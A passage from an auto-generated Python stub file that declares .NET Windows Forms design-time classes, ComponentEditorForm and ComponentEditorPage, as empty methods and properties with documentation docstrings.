OnParentRightToLeftChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RightToLeftChanged event when the
System.Windows.Forms.Control.RightToLeft property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentVisibleChanged(self, *args): #cannot find CLR method
"""
OnParentVisibleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event when the
System.Windows.Forms.Control.Visible property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPreviewKeyDown(self, *args): #cannot find CLR method
"""
OnPreviewKeyDown(self: Control, e: PreviewKeyDownEventArgs)
Raises the System.Windows.Forms.Control.PreviewKeyDown event.
e: A System.Windows.Forms.PreviewKeyDownEventArgs that contains the event data.
"""
pass
def OnPrint(self, *args): #cannot find CLR method
"""
OnPrint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self, *args): #cannot find CLR method
"""
OnQueryContinueDrag(self: Control, qcdevent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.Control.QueryContinueDrag event.
qcdevent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRegionChanged(self, *args): #cannot find CLR method
"""
OnRegionChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RegionChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnResize(self, *args): #cannot find CLR method
"""
OnResize(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnResizeBegin(self, *args): #cannot find CLR method
"""
OnResizeBegin(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.ResizeBegin event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnResizeEnd(self, *args): #cannot find CLR method
"""
OnResizeEnd(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.ResizeEnd event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftChanged(self: ScrollableControl, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftLayoutChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftLayoutChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.RightToLeftLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnScroll(self, *args): #cannot find CLR method
"""
OnScroll(self: ScrollableControl, se: ScrollEventArgs)
Raises the System.Windows.Forms.ScrollableControl.Scroll event.
se: A System.Windows.Forms.ScrollEventArgs that contains the event data.
"""
pass
def OnSelChangeSelector(self, *args): #cannot find CLR method
"""
OnSelChangeSelector(self: ComponentEditorForm, source: object, e: TreeViewEventArgs)
Switches between component editor pages.
source: The source of the event.
e: A System.Windows.Forms.TreeViewEventArgs that contains the event data.
"""
pass
def OnShown(self, *args): #cannot find CLR method
"""
OnShown(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Shown event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnSizeChanged(self, *args): #cannot find CLR method
"""
OnSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnStyleChanged(self, *args): #cannot find CLR method
"""
OnStyleChanged(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnSystemColorsChanged(self, *args): #cannot find CLR method
"""
OnSystemColorsChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SystemColorsChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabIndexChanged(self, *args): #cannot find CLR method
"""
OnTabIndexChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabIndexChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabStopChanged(self, *args): #cannot find CLR method
"""
OnTabStopChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabStopChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self, *args): #cannot find CLR method
"""
OnTextChanged(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidated(self, *args): #cannot find CLR method
"""
OnValidated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Validated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidating(self, *args): #cannot find CLR method
"""
OnValidating(self: Control, e: CancelEventArgs)
Raises the System.Windows.Forms.Control.Validating event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self, *args): #cannot find CLR method
"""
OnVisibleChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def PreProcessMessage(self, msg):
"""
PreProcessMessage(self: ComponentEditorForm, msg: Message) -> (bool, Message)
Provides a method to override in order to preprocess input messages before they are dispatched.
msg: A System.Windows.Forms.Message that specifies the message to preprocess.
Returns: true if the specified message is for a component editor page; otherwise, false.
"""
pass
def ProcessCmdKey(self, *args): #cannot find CLR method
"""
ProcessCmdKey(self: Form, msg: Message, keyData: Keys) -> (bool, Message)
Processes a command key.
msg: A System.Windows.Forms.Message, passed by reference, that represents the Win32 message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the keystroke was processed and consumed by the control; otherwise, false to allow
further processing.
"""
pass
def ProcessDialogChar(self, *args): #cannot find CLR method
"""
ProcessDialogChar(self: Form, charCode: Char) -> bool
Processes a dialog character.
charCode: The character to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogKey(self, *args): #cannot find CLR method
"""
ProcessDialogKey(self: Form, keyData: Keys) -> bool
Processes a dialog box key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the keystroke was processed and consumed by the control; otherwise, false to allow
further processing.
"""
pass
def ProcessKeyEventArgs(self, *args): #cannot find CLR method
"""
ProcessKeyEventArgs(self: Control, m: Message) -> (bool, Message)
Processes a key message and generates the appropriate control events.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyMessage(self, *args): #cannot find CLR method
"""
ProcessKeyMessage(self: Control, m: Message) -> (bool, Message)
Processes a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyPreview(self, *args): #cannot find CLR method
"""
ProcessKeyPreview(self: Form, m: Message) -> (bool, Message)
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessMnemonic(self, *args): #cannot find CLR method
"""
ProcessMnemonic(self: Form, charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true if the character was processed as a mnemonic by the control; otherwise, false.
"""
pass
def ProcessTabKey(self, *args): #cannot find CLR method
"""
ProcessTabKey(self: Form, forward: bool) -> bool
forward: true to cycle forward through the controls in the System.Windows.Forms.ContainerControl;
otherwise, false.
Returns: true if a control is selected; otherwise, false.
"""
pass
def RaiseDragEvent(self, *args): #cannot find CLR method
"""
RaiseDragEvent(self: Control, key: object, e: DragEventArgs)
Raises the appropriate drag event.
key: The event to raise.
e: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def RaiseKeyEvent(self, *args): #cannot find CLR method
"""
RaiseKeyEvent(self: Control, key: object, e: KeyEventArgs)
Raises the appropriate key event.
key: The event to raise.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def RaiseMouseEvent(self, *args): #cannot find CLR method
"""
RaiseMouseEvent(self: Control, key: object, e: MouseEventArgs)
Raises the appropriate mouse event.
key: The event to raise.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def RaisePaintEvent(self, *args): #cannot find CLR method
"""
RaisePaintEvent(self: Control, key: object, e: PaintEventArgs)
Raises the appropriate paint event.
key: The event to raise.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def RecreateHandle(self, *args): #cannot find CLR method
"""
RecreateHandle(self: Control)
Forces the re-creation of the handle for the control.
"""
pass
def RescaleConstantsForDpi(self, *args): #cannot find CLR method
""" RescaleConstantsForDpi(self: Control, deviceDpiOld: int, deviceDpiNew: int) """
pass
def ResetMouseEventArgs(self, *args): #cannot find CLR method
"""
ResetMouseEventArgs(self: Control)
Resets the control to handle the System.Windows.Forms.Control.MouseLeave event.
"""
pass
def RtlTranslateAlignment(self, *args): #cannot find CLR method
"""
RtlTranslateAlignment(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
RtlTranslateAlignment(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
RtlTranslateAlignment(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateContent(self, *args): #cannot find CLR method
"""
RtlTranslateContent(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
"""
pass
def RtlTranslateHorizontal(self, *args): #cannot find CLR method
"""
RtlTranslateHorizontal(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateLeftRight(self, *args): #cannot find CLR method
"""
RtlTranslateLeftRight(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
"""
pass
def ScaleControl(self, *args): #cannot find CLR method
"""
ScaleControl(self: Form, factor: SizeF, specified: BoundsSpecified)
Scales the location, size, padding, and margin of a control.
factor: The factor by which the height and width of the control are scaled.
specified: A System.Windows.Forms.BoundsSpecified value that specifies the bounds of the control to use
when defining its size and position.
"""
pass
def ScaleCore(self, *args): #cannot find CLR method
"""
ScaleCore(self: Form, x: Single, y: Single)
Performs scaling of the form.
x: Percentage to scale the form horizontally
y: Percentage to scale the form vertically
"""
pass
def ScrollToControl(self, *args): #cannot find CLR method
"""
ScrollToControl(self: ScrollableControl, activeControl: Control) -> Point
Calculates the scroll offset to the specified child control.
activeControl: The child control to scroll into view.
Returns: The upper-left hand System.Drawing.Point of the display area relative to the client area
required to scroll the control into view.
"""
pass
def Select(self):
"""
Select(self: Form, directed: bool, forward: bool)
Selects this form, and optionally selects the next or previous control.
directed: If set to true that the active control is changed
forward: If directed is true, then this controls the direction in which focus is moved. If this is true,
then the next control is selected; otherwise, the previous control is selected.
"""
pass
def SetAutoSizeMode(self, *args): #cannot find CLR method
"""
SetAutoSizeMode(self: Control, mode: AutoSizeMode)
Sets a value indicating how a control will behave when its System.Windows.Forms.Control.AutoSize
property is enabled.
mode: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def SetBoundsCore(self, *args): #cannot find CLR method
"""
SetBoundsCore(self: Form, x: int, y: int, width: int, height: int, specified: BoundsSpecified)
x: The x-coordinate.
y: The y-coordinate.
width: The bounds width.
height: The bounds height.
specified: A value from the BoundsSpecified enumeration.
"""
pass
def SetClientSizeCore(self, *args): #cannot find CLR method
"""
SetClientSizeCore(self: Form, x: int, y: int)
Sets the client size of the form. This will adjust the bounds of the form to make the client
size the requested size.
x: Requested width of the client region.
y: Requested height of the client region.
"""
pass
def SetDisplayRectLocation(self, *args): #cannot find CLR method
"""
SetDisplayRectLocation(self: ScrollableControl, x: int, y: int)
Positions the display window to the specified value.
x: The horizontal offset at which to position the System.Windows.Forms.ScrollableControl.
y: The vertical offset at which to position the System.Windows.Forms.ScrollableControl.
"""
pass
def SetScrollState(self, *args): #cannot find CLR method
"""
SetScrollState(self: ScrollableControl, bit: int, value: bool)
Sets the specified scroll state flag.
bit: The scroll state flag to set.
value: The value to set the flag.
"""
pass
def SetStyle(self, *args): #cannot find CLR method
"""
SetStyle(self: Control, flag: ControlStyles, value: bool)
Sets a specified System.Windows.Forms.ControlStyles flag to either true or false.
flag: The System.Windows.Forms.ControlStyles bit to set.
value: true to apply the specified style to the control; otherwise, false.
"""
pass
def SetTopLevel(self, *args): #cannot find CLR method
"""
SetTopLevel(self: Control, value: bool)
Sets the control as the top-level control.
value: true to set the control as the top-level control; otherwise, false.
"""
pass
def SetVisibleCore(self, *args): #cannot find CLR method
"""
SetVisibleCore(self: Form, value: bool)
value: true to make the control visible; otherwise, false.
"""
pass
def ShowForm(self, *__args):
"""
ShowForm(self: ComponentEditorForm, owner: IWin32Window) -> DialogResult
Shows the form with the specified owner.
owner: The System.Windows.Forms.IWin32Window to own the dialog.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm, owner: IWin32Window, page: int) -> DialogResult
Shows the form and the specified page with the specified owner.
owner: The System.Windows.Forms.IWin32Window to own the dialog.
page: The index of the page to show.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm) -> DialogResult
Shows the form. The form will have no owner window.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm, page: int) -> DialogResult
Shows the specified page of the specified form. The form will have no owner window.
page: The index of the page to show.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
"""
pass
def SizeFromClientSize(self, *args): #cannot find CLR method
"""
SizeFromClientSize(self: Control, clientSize: Size) -> Size
Determines the size of the entire control from the height and width of its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def UpdateBounds(self, *args): #cannot find CLR method
"""
UpdateBounds(self: Control, x: int, y: int, width: int, height: int, clientWidth: int, clientHeight: int)
Updates the bounds of the control with the specified size, location, and client size.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
clientWidth: The client System.Drawing.Size.Width of the control.
clientHeight: The client System.Drawing.Size.Height of the control.
UpdateBounds(self: Control, x: int, y: int, width: int, height: int)
Updates the bounds of the control with the specified size and location.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
UpdateBounds(self: Control)
Updates the bounds of the control with the current size and location.
"""
pass
def UpdateDefaultButton(self, *args): #cannot find CLR method
"""
UpdateDefaultButton(self: Form)
Updates which button is the default button.
"""
pass
def UpdateStyles(self, *args): #cannot find CLR method
"""
UpdateStyles(self: Control)
Forces the assigned styles to be reapplied to the control.
"""
pass
def UpdateZOrder(self, *args): #cannot find CLR method
"""
UpdateZOrder(self: Control)
Updates the control in its parent's z-order.
"""
pass
def WndProc(self, *args): #cannot find CLR method
"""
WndProc(self: Form, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def __enter__(self, *args): #cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): #cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, component, pageTypes):
""" __new__(cls: type, component: object, pageTypes: Array[Type]) """
pass
def __str__(self, *args): #cannot find CLR method
pass
AutoScaleFactor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the scaling factor between the current and design-time automatic scaling dimensions.
"""
AutoSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Get: AutoSize(self: ComponentEditorForm) -> bool
Set: AutoSize(self: ComponentEditorForm) = value
"""
CanEnableIme = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value, to enable IME support.
"""
CanRaiseEvents = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Determines if events can be raised on the control.
"""
CreateParams = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DefaultCursor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the space, in pixels, that is specified by default between controls.
"""
DefaultMaximumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default maximum size of a control.
"""
DefaultMinimumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default minimum size of a control.
"""
DefaultPadding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the internal spacing, in pixels, of the contents of a control.
"""
DefaultSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DesignMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether this control should redraw its surface using a secondary buffer to reduce or prevent flicker.
"""
Events = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FontHeight = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the height of the font of the control.
"""
HScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the horizontal scroll bar is visible.
"""
ImeModeBase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the IME mode of a control.
"""
MaximizedBounds = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets and sets the size of the form when it is maximized.
"""
RenderRightToLeft = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is now obsolete.
"""
ResizeRedraw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the control redraws itself when resized.
"""
ScaleChildren = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that determines the scaling of child controls.
"""
ShowFocusCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the control should display focus rectangles.
"""
ShowKeyboardCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the user interface is in the appropriate state to show or hide keyboard accelerators.
"""
ShowWithoutActivation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the window will be activated when it is shown.
"""
VScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the vertical scroll bar is visible.
"""
AutoSizeChanged = None
class ComponentEditorPage(Panel, IComponent, IDisposable, IOleControl, IOleObject, IOleInPlaceObject, IOleInPlaceActiveObject, IOleWindow, IViewObject, IViewObject2, IPersist, IPersistStreamInit, IPersistPropertyBag, IPersistStorage, IQuickActivate, ISupportOleDropSource, IDropTarget, ISynchronizeInvoke, IWin32Window, IArrangedElement, IBindableComponent):
"""
Provides a base implementation for a System.Windows.Forms.Design.ComponentEditorPage.
ComponentEditorPage()
"""
def AccessibilityNotifyClients(self, *args): #cannot find CLR method
"""
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, objectID: int, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control .
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
objectID: The identifier of the System.Windows.Forms.AccessibleObject.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control.
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
"""
pass
def Activate(self):
"""
Activate(self: ComponentEditorPage)
Activates and displays the page.
"""
pass
def AdjustFormScrollbars(self, *args): #cannot find CLR method
"""
AdjustFormScrollbars(self: ScrollableControl, displayScrollbars: bool)
Adjusts the scroll bars on the container based on the current control positions and the control
currently selected.
displayScrollbars: true to show the scroll bars; otherwise, false.
"""
pass
def ApplyChanges(self):
"""
ApplyChanges(self: ComponentEditorPage)
Applies changes to all the components being edited.
"""
pass
def CreateAccessibilityInstance(self, *args): #cannot find CLR method
"""
CreateAccessibilityInstance(self: Control) -> AccessibleObject
Creates a new accessibility object for the control.
Returns: A new System.Windows.Forms.AccessibleObject for the control.
"""
pass
def CreateControlsInstance(self, *args): #cannot find CLR method
"""
CreateControlsInstance(self: Control) -> ControlCollection
Creates a new instance of the control collection for the control.
Returns: A new instance of System.Windows.Forms.Control.ControlCollection assigned to the control.
"""
pass
def CreateHandle(self, *args): #cannot find CLR method
"""
CreateHandle(self: Control)
Creates a handle for the control.
"""
pass
def Deactivate(self):
"""
Deactivate(self: ComponentEditorPage)
Deactivates and hides the page.
"""
pass
def DefWndProc(self, *args): #cannot find CLR method
"""
DefWndProc(self: Control, m: Message) -> Message
Sends the specified message to the default window procedure.
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def DestroyHandle(self, *args): #cannot find CLR method
"""
DestroyHandle(self: Control)
Destroys the handle associated with the control.
"""
pass
def Dispose(self):
"""
Dispose(self: Control, disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.Control and its child controls
and optionally releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EnterLoadingMode(self, *args): #cannot find CLR method
"""
EnterLoadingMode(self: ComponentEditorPage)
Increments the loading counter.
"""
pass
def ExitLoadingMode(self, *args): #cannot find CLR method
"""
ExitLoadingMode(self: ComponentEditorPage)
Decrements the loading counter.
"""
pass
def GetAccessibilityObjectById(self, *args): #cannot find CLR method
"""
GetAccessibilityObjectById(self: Control, objectId: int) -> AccessibleObject
Retrieves the specified System.Windows.Forms.AccessibleObject.
objectId: An Int32 that identifies the System.Windows.Forms.AccessibleObject to retrieve.
Returns: An System.Windows.Forms.AccessibleObject.
"""
pass
def GetAutoSizeMode(self, *args): #cannot find CLR method
"""
GetAutoSizeMode(self: Control) -> AutoSizeMode
Retrieves a value indicating how a control will behave when its
System.Windows.Forms.Control.AutoSize property is enabled.
Returns: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def GetControl(self):
"""
GetControl(self: ComponentEditorPage) -> Control
Gets the control that represents the window for this page.
Returns: The System.Windows.Forms.Control that represents the window for this page.
"""
pass
def GetScaledBounds(self, *args): #cannot find CLR method
"""
GetScaledBounds(self: Control, bounds: Rectangle, factor: SizeF, specified: BoundsSpecified) -> Rectangle
Retrieves the bounds within which the control is scaled.
bounds: A System.Drawing.Rectangle that specifies the area for which to retrieve the display bounds.
factor: The height and width of the control's bounds.
specified: One of the values of System.Windows.Forms.BoundsSpecified that specifies the bounds of the
control to use when defining its size and position.
Returns: A System.Drawing.Rectangle representing the bounds within which the control is scaled.
"""
pass
def GetScrollState(self, *args): #cannot find CLR method
"""
GetScrollState(self: ScrollableControl, bit: int) -> bool
Determines whether the specified flag has been set.
bit: The flag to check.
Returns: true if the specified flag has been set; otherwise, false.
"""
pass
def GetSelectedComponent(self, *args): #cannot find CLR method
"""
GetSelectedComponent(self: ComponentEditorPage) -> IComponent
Gets the component that is to be edited.
Returns: The System.ComponentModel.IComponent that is to be edited.
"""
pass
def GetService(self, *args): #cannot find CLR method
"""
GetService(self: Component, service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component, or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def GetStyle(self, *args): #cannot find CLR method
"""
GetStyle(self: Control, flag: ControlStyles) -> bool
Retrieves the value of the specified control style bit for the control.
flag: The System.Windows.Forms.ControlStyles bit to return the value from.
Returns: true if the specified control style bit is set to true; otherwise, false.
"""
pass
def GetTopLevel(self, *args): #cannot find CLR method
"""
GetTopLevel(self: Control) -> bool
Determines if the control is a top-level control.
Returns: true if the control is a top-level control; otherwise, false.
"""
pass
def InitLayout(self, *args): #cannot find CLR method
"""
InitLayout(self: Control)
Called after the control has been added to another container.
"""
pass
def InvokeGotFocus(self, *args): #cannot find CLR method
"""
InvokeGotFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeLostFocus(self, *args): #cannot find CLR method
"""
InvokeLostFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeOnClick(self, *args): #cannot find CLR method
"""
InvokeOnClick(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Click event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokePaint(self, *args): #cannot find CLR method
"""
InvokePaint(self: Control, c: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def InvokePaintBackground(self, *args): #cannot find CLR method
"""
InvokePaintBackground(self: Control, c: Control, e: PaintEventArgs)
Raises the PaintBackground event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def IsFirstActivate(self, *args): #cannot find CLR method
"""
IsFirstActivate(self: ComponentEditorPage) -> bool
Gets a value indicating whether the page is being activated for the first time.
Returns: true if this is the first time the page is being activated; otherwise, false.
"""
pass
def IsInputChar(self, *args): #cannot find CLR method
"""
IsInputChar(self: Control, charCode: Char) -> bool
Determines if a character is an input character that the control recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the control and not preprocessed; otherwise,
false.
"""
pass
def IsInputKey(self, *args): #cannot find CLR method
"""
IsInputKey(self: Control, keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise, false.
"""
pass
def IsLoading(self, *args): #cannot find CLR method
"""
IsLoading(self: ComponentEditorPage) -> bool
Gets a value indicating whether the page is being loaded.
Returns: true if the page is being loaded; otherwise, false.
"""
pass
def IsPageMessage(self, msg):
"""
IsPageMessage(self: ComponentEditorPage, msg: Message) -> (bool, Message)
Processes messages that could be handled by the page.
msg: The message to process.
Returns: true if the page processed the message; otherwise, false.
"""
pass
def LoadComponent(self, *args): #cannot find CLR method
"""
LoadComponent(self: ComponentEditorPage)
Loads the component into the page user interface (UI).
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def NotifyInvalidate(self, *args): #cannot find CLR method
"""
NotifyInvalidate(self: Control, invalidatedArea: Rectangle)
Raises the System.Windows.Forms.Control.Invalidated event with a specified region of the control
to invalidate.
invalidatedArea: A System.Drawing.Rectangle representing the area to invalidate.
"""
pass
def OnApplyComplete(self):
"""
OnApplyComplete(self: ComponentEditorPage)
Called when the page and any sibling pages have applied their changes.
"""
pass
def OnAutoSizeChanged(self, *args): #cannot find CLR method
"""
OnAutoSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.AutoSizeChanged event.
